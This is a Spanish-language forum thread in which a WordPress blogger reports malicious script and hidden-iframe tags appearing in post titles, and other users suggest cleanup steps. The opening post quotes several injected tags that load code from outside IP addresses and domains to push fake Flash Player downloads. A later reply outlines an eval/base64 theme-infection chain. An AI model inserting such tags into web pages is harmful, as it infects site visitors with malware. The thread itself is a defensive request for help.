Códigos maliciosos en títulos de Wordpress

Carlos Arreola · 22 Abr 2013

Me está pasando en alguno que otro blog que en algunos títulos, después de creadas las entradas se auto inserta un código como alguno de los siguientes:

Insertar CODE, HTML o PHP:

<script src="http://85.25.166.46/i"></script>

<iframe width='1*10' height='1*10' frameborder='0' src='http://quantum.ghaman.com/lfercfy?fkxurppuqp=2860537'></iframe>

<script src="http://66.197.135.219/java.js"></script>

<script src="http://66.226.75.63/aHR0cDovL3d3dsKOpZG1lc2VzZdoWXJpZXMudHYv"></script>

Que hace que el usuario descargue cualquier tontería haciéndose pasar por flashplayer o algún otro programa, a la larga me van bloqueando las entradas chrome y eso resulta en menos visitas. ¿Alguien le ha tocado este tipo de problemas y saben como resolverlo?

alejandrosu · 22 Abr 2013

Buenas, creo que puedo ayudarte.

Teoricamente con quitar el iframe valdría pero si te cargas todas las lineas mejor, ya que si quieren una librería deberia de solicitarla a las url públicas de google

Carlos Arreola · 22 Abr 2013

Y sí voy quitando las líneas, el problema es que quiero conocer el origen para evitar siga pasando. Generalmente un redactor publica una entrada y a los días aparece una línea de estas en el título.

Jorge02 · 22 Abr 2013

Lo que te muestra es como el reproductor de vídeos pero te pide descargar el plugin de FlashPlayer? yo he visto esto en algunos sitios como pero publicidad osea las similares a adsense

Carlos Arreola · 22 Abr 2013

Esto es lo que pasa al tiempo de crearse una entrada:

---------- Post agregado el 22-abr-2013 hora: 00:46 ----------

Por lo pronto he ido buscando cualquier entrada en la base de datos con la referencia a <script, espero con eso baste.

fdelpozo · 22 Abr 2013

Re: Virus de flashplayer en títulos de wordpress

Yo comprobaria que no tienes ningún archivo del core de wp modificado, reinstalando desde el mismo panel o actualizando a la última versión.
También buscaría esas cadenas en los fuentes de los plugins.

PD: Carlos, cuando publico desde Tapatalk salen mal las tildes.

johan · 22 Abr 2013

reinstala todo el wp, limpia la base de datos y cambia claves de root, admin y similares:encouragement:

DoctorPC · 22 Abr 2013

Es como ir al doctor, hay que revisar parte por parte...

truesouth · 22 Abr 2013

[MENTION=1]Carlos Arreola[/MENTION], probaste con TAC? Puede ayudarte a identificar si hay algún código malicioso que pueda estar causando el problema. También te puede ser muy útil Exploit Scanner.

WindHack · 23 Abr 2013

¿De casualidad no hay algún plugin extraño instalado?

Carlos Arreola · 23 Abr 2013

Voy a probar esos que dicen y les cuento pero yo creo mañana temprano que ahorita ya vengo frito u_u

Mr. Nitro · 23 Abr 2013

Carlos Arreola dijo:
Voy a probar esos que dicen y les cuento pero yo creo mañana temprano que ahorita ya vengo frito u_u

prueba borrando el theme del sitio y volviéndolo a subir, hace tiempo me insertaron un código así y me di cuenta que el código estaba insertado dentro de los archivos del theme, en mi caso termine subiendo un respaldo que tenia del sitio (solo archivos sin tocar la base de datos), saludos.

RKOOO · 23 Abr 2013

Te recomiendo reinstalar wordpress

blimo86 · 23 Jul 2013

¿Al final como quedo esto? ¿Lo solucionaste? ¿Como lo lograste? A mi me está pasando lo mismo.
Gracias !!

villabull · 25 Jul 2013

Que extraño tu caso, nunca vi uno igual...
Seguiré el post para ver como se resuelve, suerte!

Sent from my BlackBerry using Tapatalk

aconrado · 25 Jul 2013

villabull dijo:
Que extraño tu caso, nunca vi uno igual...
Seguiré el post para ver como se resuelve, suerte!

Sent from my BlackBerry using Tapatalk

Ah caray... que raro que dices que no lo has visto... porque en el post http://forobeta.com/wordpress/190810-codigo-malicioso.html dices que "Eso lo traen más que todo las plantillas gratis", respondiéndo a un comentario mio que describía un problema similar... pero bueno...

Sobre el tema, aunque ya comenté un poco en otro post, lo que yo he observado un par de veces es que se sube un theme nuevo que contiene en alguno de los archivos de include, un eval(base64_encode("blahblahblah")). Luego, un atacante remoto (creería yo que un bot, o bien alguien que sabe que se ha subido el archivo malicioso) hace una peticion HTTP directo al archivo infectado. Al ejecutarse la petición de dicho archivo, el script evaluado con eval infecta a su vez archivos de include core de WP. El nuevo archivo infectado, contiene a su vez un eval, que cuando se ejecuta, genera el código malicioso que a su vez ejecutará en su navegador el cliente.

Como ya se dijo en este post, la forma de resolverlo es usando una instalación fresca del WP. Si ni así se quita, entonces hay que hacer una búsqueda manual del archivo malicioso (esto se hace checando peticiones WEB de archivos de include), y de ahí determinar como está realizando la infección, para localizar los archivos infectados, y localizarlos por limpios.

Lo que describí aquí es un vector de ataque general. Las ocurrencias exactas pueden variar, pero el mecanismo es el mismo. Yo he observado, como lo dije con anterioridad, por lo menos dos ocurrencias. Lo descrito en el post inicial, me suena altamente a que se originó de la misma forma.

villabull · 25 Jul 2013

aconrado dijo:
Ah caray... que raro que dices que no lo has visto... porque en el post http://forobeta.com/wordpress/190810-codigo-malicioso.html dices que "Eso lo traen más que todo las plantillas gratis", respondiéndo a un comentario mio que describía un problema similar... pero bueno...

Sobre el tema, aunque ya comenté un poco en otro post, lo que yo he observado un par de veces es que se sube un theme nuevo que contiene en alguno de los archivos de include, un eval(base64_encode("blahblahblah")). Luego, un atacante remoto (creería yo que un bot, o bien alguien que sabe que se ha subido el archivo malicioso) hace una peticion HTTP directo al archivo infectado. Al ejecutarse la petición de dicho archivo, el script evaluado con eval infecta a su vez archivos de include core de WP. El nuevo archivo infectado, contiene a su vez un eval, que cuando se ejecuta, genera el código malicioso que a su vez ejecutará en su navegador el cliente.

Como ya se dijo en este post, la forma de resolverlo es usando una instalación fresca del WP. Si ni así se quita, entonces hay que hacer una búsqueda manual del archivo malicioso (esto se hace checando peticiones WEB de archivos de include), y de ahí determinar como está realizando la infección, para localizar los archivos infectados, y localizarlos por limpios.

Lo que describí aquí es un vector de ataque general. Las ocurrencias exactas pueden variar, pero el mecanismo es el mismo. Yo he observado, como lo dije con anterioridad, por lo menos dos ocurrencias. Lo descrito en el post inicial, me suena altamente a que se originó de la misma forma.

No le veo nada raro, puesto que en el otro es un archivo que apareció de la nada y en este caso, no se sabe lo que ocasiona dicho problema.

aconrado · 26 Jul 2013

villabull dijo:
No le veo nada raro, puesto que en el otro es un archivo que apareció de la nada y en este caso, no se sabe lo que ocasiona dicho problema.

Pues, lo raro es que citaste mi respuesta, no el post original, y en mi respuesta yo describía un problema casi idéntico al de este post... ¿o será que a veces no lees bien lo que citas?...

Daltonico08 · 2013-08-28T20:47:46-0500

[MENTION=1]Carlos Arreola[/MENTION] al fin si pudiste solucionarlo a mi me sucede lo mismo y eso es baja en visitas y en su maxime un bloqueo de chrome.

Códigos maliciosos en títulos de Wordpress

Carlos Arreola

alejandrosu

Carlos Arreola

Jorge02

Carlos Arreola

fdelpozo

johan

DoctorPC

truesouth

WindHack

Carlos Arreola

Mr. Nitro

RKOOO

blimo86

villabull

aconrado

villabull

aconrado

Daltonico08

Temas similares